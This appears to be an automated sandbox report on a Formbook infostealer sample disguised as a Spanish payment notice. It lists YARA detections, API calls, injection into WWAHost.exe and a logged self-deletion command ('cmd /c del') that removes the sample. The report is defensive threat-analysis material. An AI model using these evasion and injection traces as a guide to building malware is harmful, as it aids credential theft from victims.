          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_02F1C754
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_02F1EB98
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_02F1EB88
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_076A2113
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_076A4F58
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_076A5CA8
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 0_2_076A9AE0
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00401030
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041E1AE
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0040926C
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00409270
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041DBB2
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0040DC10
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00402D88
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00402D90
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041DEF4
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_00402FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398EBB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1DBD2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A22B28
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A222AE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395F900
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03974120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396B090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A220A8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039820A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A228EC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A2E824
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11002
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A21FF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A22EF7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03976E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1D616
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A225DD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A22D07
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03950D20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A21D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396841F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1D466
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A6926C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A69270
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7DBB2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A6DC10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A62D88
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A62D90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7DEF3
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A62FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0395B150 appears 35 times
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A310 NtCreateFile,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A3C0 NtReadFile,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A440 NtClose,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A4F0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A362 NtCreateFile,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A30A NtCreateFile,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A3BA NtReadFile,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A43B NtClose,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A4EA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 8_2_0041A4F4 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039996D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039995D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039999D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039998A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039998F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039997A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_039995F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0399AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03999560 NtWriteFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A3C0 NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A310 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A4F0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A440 NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A3BA NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A30A NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A362 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A4EA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A4F4 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_00A7A43B NtClose,
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.314207449.0000000007930000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.308434377.0000000000C16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFormatExcept.exeF vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000000.303233250.0000000000E96000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFormatExcept.exeF vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.381717233.00000000039B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000002.385915801.0000000001CFF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386824949.00000000038D6000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.306954207.0000000001830000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.308930393.00000000019D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exeBinary or memory string: OriginalFilenameFormatExcept.exeF vs Notificaci#U00f3n de pago.exe
          Source: Notificaci#U00f3n de pago.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Notificaci#U00f3n de pago.exeVirustotal: Detection: 21%
          Source: Notificaci#U00f3n de pago.exeReversingLabs: Detection: 41%
          Source: Notificaci#U00f3n de pago.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Notificaci#U00f3n de pago.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/3
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Notificaci#U00f3n de pago.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Notificaci#U00f3n de pago.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Notificaci#U00f3n de pago.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: WWAHost.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb8A source: Notificaci#U00f3n de pago.exe
          Source: Binary string: WWAHost.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
